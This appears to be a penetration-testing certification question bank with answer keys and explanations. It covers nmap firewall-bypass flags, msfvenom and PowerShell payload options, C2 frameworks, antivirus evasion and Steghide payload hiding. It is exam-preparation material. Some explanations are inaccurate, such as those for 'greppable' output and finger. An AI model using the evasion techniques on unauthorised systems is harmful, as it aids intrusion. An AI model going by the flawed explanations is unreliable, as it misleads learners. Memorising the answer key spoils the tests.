.NET is a cross-platform open-source software development framework. What operating system will the current version of .NET operate on? (Select all that apply.) a) Android b) Windows c) Linux d) macOS
b) Windows c) Linux d) macOS #The current version of .NET continues to run on Windows just as the old version of .NET did. It also continues to provide the basic functionality of the original .NET Framework. #The original .NET framework operated on Windows, but the current .NET will also operate on Linux. #.NET will run on macOS version 10.3 and higher and is made up of the runtime and the Software Development Kit. The .NET framework will not run on the Android operating system.
A penetration tester has landed a shell on a Linux box and wants to find out more about the users' login and idle time. Which built-in bash command should they use? a) cat /etc/passwd b) finger c) uname -a d) env
b) finger #The finger command views a user's home directory along with login and idle time. You can also use nmap -O or -sV scans to fingerprint the operating system and interrogate its services. #The cat /etc/passwd command lists all users on the system. If the Linux host is running the Samba service, you can use nmap smb-* NSE scripts against the target. #The uname -a command displays the OS name, version, and other details. If a Linux machine is compromised using Metasploit, the post/linux/enum_system module can be used to get information about the system. #The env command outputs a list of all the environmental variables.
A PenTester wants to use pre-existing libraries in a script. Which of the following will allow the PenTester to do that? a) def b) import c) my_str= d) $my_str =
b) import #import declares a pre-existing library that the script can use. If it is an external library module, the PenTester will need to download and install it before it can be imported #def defines a function in Python. Functions, or Procedures, produce modular, reusable code by grouping a block of code under a name that can call the function whenever needed. #my_str= is a Bash command used to assign a variable. The lack of whitespace around the equals signthis is a strict rule in Bash. PowerShell, Python, and Ruby allow whitespace. #$my_str = is a PowerShell command used to assign a variable. PowerShell requires the dollar sign for a variable assignment.
A security researcher wants to scan documents against a website for only pdf documents. What metagoofil parameter could they use? a) metagoofil -d b) metagoofil -t c) metagoofil -l d) metagoofil -n
b) metagoofil -t #metagoofil -t pdf scans for pdf documents. Metagoofil scrapes the metadata, and then displays the information using Hypertext Markup Language (HTML). #metagoofil -d comptia.org scans for documents on Comptia.org. Metagoofil uses various python libraries such as PdfMiner, GoogleSearch, and Hachoir. #metagoofil -l 75 searches for 75 documents. The output can then be viewed in a standard browser. Another valuable tool is FOCA, which can discover metadata from a variety of sources. #metagoofil -n 25 downloads 25 files. You can download a copy of Metagoofil from GitHub. In addition, the tool is built into Kali Linux. NOTE: Metagoofil uses various python libraries such as PdfMiner, GoogleSearch, and Hachoir to scrape the metadata, and then displays the information using Hypertext Markup Language (HTML).
A security consultant is in the reconnaissance phase of a penetration test and believes there might be a non-stateful firewall blocking the scan. What nmap parameter could try to bypass the non-stateful firewall? a) -sS b) -oX c) -sF d) -sX
c) -sF #The -sF option sends a TCP FIN to bypass a non-stateful firewall. #When using Nmap, the TCP SYN scan (-sS) is the default and most popular option. It can be performed quickly and is able to scan thousands of ports per second on a fast network not hampered by restrictive firewalls. #XML output (-oX) is a format that can easily be analyzed by security automation tools, converted to HTML, imported into a database, or studied using Zenmap. #A Christmas tree scan sends a TCP segment with the FIN, PSH, and URG flags raised to bypass a firewall or IDS. This scan uses the option: -sX.
A PenTester assigned variables in a script and, in testing, discovered that the variables were not working because the PenTester used whitespaces around the equal signs in the variable assignments. What scripting environment is the PenTester using? a) PowerShell b) Python c) Bash d) Ruby
c) Bash #The PenTester is using Bash as the scripting environment as Bash has a strict rule against using whitespace around the equals sign when the coder is assigning variables. NOTE: PenTester is not using any other scripting environments (Powershell, python and ruby), because using whitespaces around the equal signs in the variable assignments is allowed in all of those scripting environments.
A mobile user was in the food court of a shopping mall when suddenly a video advertising a new store opening was downloaded to their device. What kind of attack was the mobile user subjected to? a) Rootkit b) Bluesnarfing c) Bluejacking d) Worm
c) Bluejacking #Know the difference between bluejacking and bluesnarfing. #The mobile user was the victim of a bluejacking attack which attackers use to send out unwanted text messages, images, or videos to a mobile phone, tablet, or laptop using a Bluetooth connection. #Rootkits provide a backdoor for illegal access to a host. Software developers often create backdoors to allow access for correcting code, but developers should remove them before the software is released. #Bluesnarfing is an aggressive attack that allows a malicious actor to read information from a victim's Bluetooth device. The end goal is to glean sensitive data from the victim.
A security researcher is setting up an evil twin as part of a security conference demonstration. Which type of attack does an evil twin typically perform? a) Jamming b) Brute force c) Deauthentication d) Zone transfer
c) Deauthentication #Getting users to join an evil twin is often accomplished by using a deauthentication attack. Once the client is kicked off the network, they may be able to trick them into reconnecting to the rogue AP.
A PenTester is writing a script and includes several blocks of code that the PenTester can use in multiple places in the script simply by calling the blocks of code by name. What kind of scripting component is the PenTester using? a) Tree b) Class c) Function d) Module
c) Function #The PenTester is using functions, or procedures, which produce modular, reusable code and allow the PenTester to group a block of code under a name and call this named function whenever needed. #Trees appear inverted in data representation, where the root is at the top and the branches go down, with a leaf object at the end of a branch. #A class is a user-defined prototype or template, which can hold its own functions and creates objects. Classes allow PenTesters to bundle data and functionality together. #Modules are a way to code re-usable functions, variables, and classes that PenTesters can import into multiple scripts.
A PenTester is running a scan and wants to save the results in a file that the PenTester will be able to perform searches on and filter results later. What type of file format will the PenTester use? a) Regular expressions (regex) b) Nmap c) Greppable d) GitHub
c) Greppable #The PenTester will save the scan results to a greppable file which is a Linux command for searching and filtering input. The PenTester can use this as a file search tool when combined with ls. #Regular expressions are a group of characters that describe how to execute a specific search pattern on a given text. #Nmap is a network discovery and security auditing tool that performs reverse-DNS resolution against every host that is online by default. #GitHub is a repository hosting service where PenTester can store and share scripts through a command-line tool or a graphical user interface.
A penetration testing team is planning an attack on an organization's IoT devices and discover that many of the devices are using an unencrypted protocol to communicate with each other which makes them susceptible to sniffing, modifying data, and becoming zombies. What protocol are the IoT devices using? a) SET b) UDP c) MQTT d) DTLS
c) MQTT #The devices are using the Message Queuing Telemetry Transport (MQTT) protocol which carries messages between devices, but the protocol does not encrypt the data which makes it vulnerable to attacks. #The Social Engineering Toolkit (SET) is a Python-based collection of tools that can be used when conducting a social engineering PenTest. #CoAP uses the User Datagram Protocol (UDP) as a transport layer protocol but has no method to provide security for group communication. #Datagram Transport Layer Security (DTLS) can use the Constrained Application Protocol (CoAP) to improve security, but there isn't any method to provide security for group communication.
A PenTester exclusively tests macOS systems and wants to use the command and control tool that will consistently provide the best results for that operating system. Which tool will the PenTester select? a) Empire b) Covenant c) Mythic d) Nishang
c) Mythic #Mythic is a cross-platform C2 framework tool that works with macOS, Linux, and Windows, but it contains payloads that provide consistently good results when PenTesting macOS. #Empire is a C2 framework that makes use of PowerShell for common post-exploitation tasks on Windows. It also has a Python component for Linux. #Covenant is a .NET command and control framework and, in a similar fashion to Empire, it aims to show the attack surface of .NET and make attacks through this vector easier.
A systems administrator for a small company is tasked with performing a vulnerability scan inside their network. They are not given a budget but instead are asked to find open-source tools. Which of the following could they use? a) theHarvester b) Metagoofil c) OpenVAS d) Scapy
c) OpenVAS #A team can run a vulnerability scan using the Open Vulnerability Assessment Scanner. OpenVAS will list the vulnerabilities along with a risk rating that summarizes the overall state of the site that was tested. #theHarvester gathers information on subdomain names, employee names, email addresses, PGP key entries, and open ports and service banners. #Scapy is a tool to craft and send a malformed packet to your target.
An employee refuses to apply updates to their mobile device for fear that it will change things on the device that will be annoying. What threat is the employee introducing? a) De-perimeterization b) Strained infrastructure c) Patching fragmentation d) Forensics complications
c) Patching fragmentation #Patching fragmentation occurs when device owners do not implement updates in a timely manner. This fragmented approach can lead to individuals using unsupported versions that leave the system vulnerable. #Deperimeterization occurs when employees take sensitive data outside of the corporate perimeter and do not properly secure their devices. This risks data exfiltration. #Strained infrastructure occurs when the addition of multiple devices places a strain on the network and causes it to stop functioning at optimum capacity and may lead to an unintentional Denial of Service. #Dealing with bring your own device during a forensic exercise may cause forensics complications and prove difficult or even impossible and compromise the integrity of an investigation.
A digital forensics expert needs to analyze an infected mobile device. What approach can the expert use to do this? (Select all that apply.) a) SMiShing b) Biometric integration c) Reverse engineering d) Sandbox analysis
c) Reverse engineering d) Sandbox analysis #The forensics expert can use reverse engineering to step through the code to see what happens when the code runs on a device. #The forensics expert can use a sandbox analysis which is using virtualization to provide a safe environment to analyze the malware. #Biometric integration is a system that employs a biometric, such as a fingerprint or facial recognition when authenticating into a system and is not a forensic analysis tool.
A security tester is looking at vulnerabilities regarding shared accounts. Which of the following environments are shared accounts more likely to be found? a) SaaS b) IaaS c) SOHO d) CDN
c) SOHO #A shared account can be used in a small office home office (SOHO) environment, as many SOHO networking devices do not allow you to create multiple accounts. #Software as a Service (SaaS) is not as likely to have a shared account as a SOHO environment. Cloud identity and account types are personnel, endpoints, servers, software, or roles. #Infrastructure as a Service (IaaS) is not as likely to have a shared account as a SOHO environment. Cloud identity and account types are personnel, endpoints, servers, software, or roles. #Data in cloud storage can be used to serve static web content, such as HTML pages, images, and videos. The content is published from the container to a content delivery network (CDN).
A threat actor has accessed a web server and is compromising the trust from the server to reach back-end resources. What type of attack is this? a) Session hijacking b) XSRF/CSRF c) SSRF d) PrivEsc
c) SSRF #In a server-side request forgery (SSRF) attack, an attacker takes advantage of the trust established between the server and the resources it can access, including itself. #In a cross-site request forgery (XSRF/CSRF) attack, an attacker takes advantage of the trust established between an authorized user of a website and the website itself. #Privilege escalation (or simply PrivEsc) describes obtaining a higher privilege than the one the user currently has, to enable resources that the regular user does not have permission for.
The Social Engineering Toolkit is being employed for a targeted attack towards personnel. Which of the following can SET NOT do? a) Mass mail attacks b) Infectious media c) Scaling d) PowerShell attacks
c) Scaling #Scaling is a physical security attack that applies to perimeter security such as natural barriers or fences, to deter someone from simply entering the property. #Mass mail attacks are the fifth option under social engineering attacks. You can download SET and install it on a Linux, Unix, and Windows machine or use it within Kali Linux. #Infectious media generator is the third option under social engineering attacks. SET allows you to select from a number of different options that include attacking websites, mass mailings, and spear phishing attacks. #PowerShell attacks are the ninth option under social engineering attacks.
A penetration tester needs to craft a custom packet in order to bypass an Intrusion Prevention System (IPS). What tools could they use to craft custom packets? (Select all that apply.) a) OpenVAS b) Metagoofil c) Scapy d) Hping3
c) Scapy d) Hping3 #Scapy is a tool to craft and send a malformed packet to your target. The type of packet crafted will be dependent on security products and rules. #Hping3 is also a tool to craft and send a malformed packet to your target. For example, the Christmas (XMAS) scan might be able to bypass security mechanisms that follow strict interpretation of RFC 793.
A penetration tester is working on a project and sees a fairly recent VoIP vulnerability has come out. Which of the following records would best help them narrow down potential targets? a) TXT b) NS c) SRV d) MX
c) Service (SRV) record provides host and port information on services such as voice over IP (VoIP) and instant messaging (IM). #Text (TXT) record provides information about a resource such as a server or network in human readable form. Nameserver (NS) record lists the authoritative DNS server for a particular domain. A standard DNS query will use DNS servers to identify the Internet Protocol (IP) address behind a particular domain or resource name. Mail Exchange (MX) record provides the mail server that accepts email messages for a particular domain.
A project manager is researching migrating to the cloud, specifically a PaaS model. Which of the following attacks is PaaS particularly subject to? a) Malware injection b) Direct-to-origin c) Side-channel d) DNS Poisoning
c) Side-channel #In a side-channel attack, this exploit is possible because of the shared nature of the cloud infrastructure, especially in a PaaS model. #In a malware injection attack, a malicious actor injects malicious code into an application. Common attacks can include SQL injection (SQLi) and Cross-Site Scripting (XSS). ###In direct-to-origin attacks (D2O), malicious actors circumvent proxy protections by identifying the origin network or IP address and then launching a direct attack.
A Linux systems administrator is concerned about data exfiltration from one of their DMZ servers. What common service should they disable on these DMZ servers for externally facing assets? a) RDP b) SSH c) Telnet d) SFTP
c) Telnet #Telnet is a cleartext protocol, not an encrypted protocol. This should be disabled regardless and not used in the enterprise unless absolutely necessary. #When communicating with a remote, Linux-based machine, it's common to use Secure Socket Shell (SSH), a protocol that provides a way to communicate securely via a CLI (shell) over an encrypted connection. #Remote Desktop Protocol (RDP) is a service on Windows machines, not on Linux machines. The X11 protocol can be used over SSH to enable graphical interfaces to Linux machines. #SFTP provides a more secure option over File Transfer Protocol (FTP). FTP is a cleartext protocol and should not be used.
A PenTester used msfvenom to generate a payload that a simplified script will download and execute. Which option indicates that PowerShell will not load any particular profile? a) -p b) -w hidden c) -c d) -nop
d) -nop #The -nop option tells PowerShell not to load any particular profile, which may customize the way PowerShell behaves in the environment. #When a PenTester uses the -p option it specifies the payload, for instance, the PenTester can use the -p option to select reverse_powershell which is located inside cmd/windows." #The -w hidden option specifies that when the payload executes, the script will hide the PowerShell window. #A PenTester can use the -c option when executing PowerShell to specify that PowerShell will execute the following command block or script and then exit.
A security professional is setting up a netcat listener but they want to start up in UDP instead of TCP. What parameter should they use? a) -l b) -L c) -e d) -u
d) -u #The -u parameter starts Netcat in UDP mode. The default is to use TCP. Netcat is a command-line utility used to read from or write to a TCP or UDP network connection.
A PenTester is installing optional tools for Linux in preparation for a PenTest. Where do PenTesters store these tools? a) /vulscan b) https://github.com c) pip3 d) /opt
d) /opt #The PenTester will store these tools in the /opt folder as /opt is where PenTesters normally install optional tools for Linux. #The PenTester will not store optional tools for Linux in /vulscan, but may store one tool in the /vulscan folder underneath the /opt folder. #The PenTester can get scripts from https://github.com. For instance, the PenTester can get a nmap script from https://github.com/scipag/vulscan /opt/vulnscan. #The PenTester will not store optional tools for Linux in pip3 as pip3 is a Python installer that PenTesters use to get modules and install them so Python can access them.
A systems administrator is looking at migrating to the cloud and hears a bunch of new terminologies they are not familiar with. What makes up a cloud federation? a) Infrastructure b) Platform services c) Software d) A combination of all these
d) A combination of all these #The combination of infrastructure, platform services, and software represents a cloud federation. #Infrastructure is one component of cloud federation. With cloud computing, an organization can access and manage data and applications from any host, anywhere in the world. #Platform services are another component of cloud federation. In a cloud environment, the attacker may simply need to have an internet connection and a dictionary of stolen password hashes to cause a breach. #Software is the last component of cloud federation. A lack of oversight in the security procedures of cloud providers can dramatically increase the risk an organization takes.
A security tester is conducting an assessment on a new network where NAC is employed. What is the most common way to bypass NAC? a) Using decoys b) Advertise a fake MAC address c) Modify the port number d) Access an authenticated device
d) Access an authenticated device #The most common way to bypass NAC is by accessing an authenticated device and using the device to slip by the NAC appliance. #When conducting a port scan on a host, you can use decoys in order to make it appear as if the packets are coming from either a trusted or random device. #In some cases, it might be effective to make the probe appear to be coming from a specific device. In that case, the team can generate a bogus source hardware (or MAC) address. #Network security devices are tuned to either allow or deny specific packets based on several different parameters. One of those parameters is the source port number.
A security researcher is analyzing various on-path attack techniques to develop detection mechanisms against them. Which of the following is NOT an on-path attack? a) DNS poisoning b) ARP poisoning c) MAC spoofing d) Biometric spoofing
d) Biometric spoofing #Biometric spoofing is not an example of an on-path attack. An on-path attack is when a malicious actor sits in the middle or in the path of a connection.
A PenTester is writing a script and is using if statements, else statements, and loops to determine how the code will execute. What is this component of a script known as? a) Variables b) Operators c) Data constructs d) Flow control
d) Flow control #Flow control, or the order in which code instructions execute, is one of the most important components of a script's logic and includes using if statements, else statements, and loops. #A variable is any value that a system stores in memory and a coder gives a name or an identifier. In code, you assign values to these variables. #Operators perform specific functions in order to produce a result. Three of the most common operations are Boolean, Arithmetic, and String. #Data constructs are components that PenTesters will use within a script and can include such constructs as variables, logic, operators, flow control, conditionals, and loops, to name but a few.
A digital forensics expert regularly evaluates both iOS and Android devices and often uses an open-source tool that allows the forensics expert to dump process memory, in-process fuzzing, and change a program's behavior. What tool does the forensics expert use? a) APK Studio b) Drozer c) Objection d) Frida
d) Frida #The forensics expert is using Frida which is an open-source tool that can work with a wide range of operating systems and allows the forensics expert to dump process memory, in-process fuzzing, and change a program's behavior. NOTE: Frida also has the ability to test if the system is jailbroken or not. Has anti-jailbreak or root detection capability. #APK Studio is an integrated development environment (IDE) designed so you can decompile and or edit an APK file. #Drozer is open-source software used for testing for vulnerabilities on Android devices. Drozer is an attack framework that allows you to find security flaws in the app and devices. #Objection is a runtime exploration toolkit that works on iOS devices. It is a scriptable debugger that allows digital forensic experts to perform various security-related tasks on unencrypted iOS applications.
A security engineer is trying to avoid Antivirus on a company's systems. Which tool could they use to modify the hash of their payloads? a) Wget b) theHarvester c) Dirbuster d) ObfuscatedEmpire
d) ObfuscatedEmpire #Obfuscating a known signature uses a tool such as ObfuscatedEmpire in a solution. It is a fork of Empire that has Invoke-Obfuscation baked directly into its functionality. #Wget is not designed to obfuscate malware, but it can be used to grab a banner using the following syntax: wget -S. When using this command, -S will print the HTTP headers that are sent by the server.
A mobile device user installed a new task management application and allowed the app to have access to all the access permissions requested without checking to see why it wanted them. What kind of attack is this? a) Execution of activities using root b) Drive by downloads c) Spyware d) Over-reach of permissions
d) Over-reach of permissions #This is an over-reach of permissions. Instead of using the principle of least privilege, a consumer may feel it is necessary to allow an app to access services and data stores that are generally restricted. #Execution of activities using root, which can occur when the user roots or jail breaks their system to improve the performance of the device, will leave the system vulnerable to an attack. #Drive by downloads can occur while browsing the internet, as a victim can click on a link that will download malicious software. Many times, the victim is unaware of this activity. #Spyware records all the keystrokes and other activity a user performs and sends to a data collection site.
A penetration tester has connected to a remote system using a tool that will keep the connection encrypted. Which tool is the penetration tester using? a) Telnet b) Netcat c) Ncat d) SSH
d) SSH #he penetration tester is using Secure Shell (SSH) which encrypts remote connections, and some configurations require the use of a digital certificate and keypair for authentication. #Telnet is an older remote protocol that does not support encryption. Most modern systems have telnet disabled by default. #Netcat is a command-line utility used to read from or write to TCP, UDP, or Unix domain socket network connections. It is highly versatile but does not use encryption. #Ncat is a tool developed for Nmap as an improvement over Netcat, not only retaining most of the functionality, but also adding more, of which an important one is support for SSL.
A secret double agent on a top-secret mission needs to conceal a payload in an audio file using tools built into Kali. What tool could they use to do this? a) SAST b) Bit-Twist c) Meterpreter d) Steghide
d) Steghide #Steghide is an open-source tool used to conceal a payload in either an image or audio file. The software can compress, conceal, and encrypt data. #Static Application Security Testing (SAST) is done early in the software development life cycle to examine the code for security vulnerabilities. #Bit-Twist uses packet crafting techniques as part of the attack. A more popular packet crafting tool is Scapy or hping3 which allows users to craft their own packets. #Meterpreter is a very popular payload of MetaSploit, which is an interactive, menu-based list of commands you can run on the target.
A network contractor is setting up wireless for a small coffee shop and wants to make sure they are secured with a standard that uses 192-bit encryption. Which of the following should they use? a) WEP b) WPA c) WPA2 d) WPA3
d) WPA3 #WPA3 includes advanced features to secure wireless transmissions such as 192-bit encryption when using WPA3-Enterprise mode (used in business LANs). #WPA features the Temporal Key Integrity Protocol (TKIP). TKIP dynamically generates a new 128-bit key for each packet. In addition, WPA includes a Message Integrity Check (MIC), which provides a stronger method (than a CRC) to ensure data integrity. #WPA2 is an improvement of WPA and replaced RC4 and TKIP with Counter Mode CBC-MAC Protocol (CCMP) using AES.
A security analyst is trying to find older versions of a company's website which contained sensitive information. They are worried that attackers might still be able to find older versions, so they want to try using web search commands. Which web search command would help them search? a) inanchor b) inurl c) site d) cache
d) cache #Use a standard cache search on a site, and you will see a recent view of the website. To do a quick check simply type cache: in the address bar. For example, cache:https://comptia.org. #inanchor searches anchor text. For example, use inanchor:Certification report to search for any pages whose anchor text includes the text "Certification" and have the text "report" anywhere on the page. #One would use inurl:Certification report to search for any pages whose URLs include the text "Certification" and have the text "report" anywhere on the page. #The security professional would enter the site:comptia.org report to search CompTIA's website only for results including the text "report."
A penetration tester has discovered that a remote access tool can open a shell on a Linux system without even authenticating. What command is the penetration tester using? a) Telnet b) RDP c) SSH d) rsh
d) rsh #The penetration tester is using rsh which is a Linux command that can open a shell, and if the server has an .rhosts file configured a certain way, the penetration tester won't even need to supply credentials. #(RDP) is Microsoft's protocol for operating remote GUI connections to a Windows machine and requires authentication.
A penetration tester is looking for secrets in Git repositories that will allow the tester to modify code. What tool is the penetration tester using? a) Brakeman b) SearchSploit c) BeEF d) truffleHog
d) truffleHog #The penetration tester is using truffleHog which can automatically crawl through a repository looking for accidental commits of secrets that will allow an attacker to modify code in a Git repository. #Brakeman is a static code analysis security tool for Ruby on Rails applications which checks for vulnerabilities and provides confidence level of finding (high, medium, weak). #SearchSploit is an exploit finder that allows users to search through the information found in Exploit-DB. It also supports Nmap outputs in XML format to search for exploits automatically. #BeEF (Browser Exploit Framework) focuses on web browser attacks by assessing the actual security posture of a target by using client-side attack vectors.
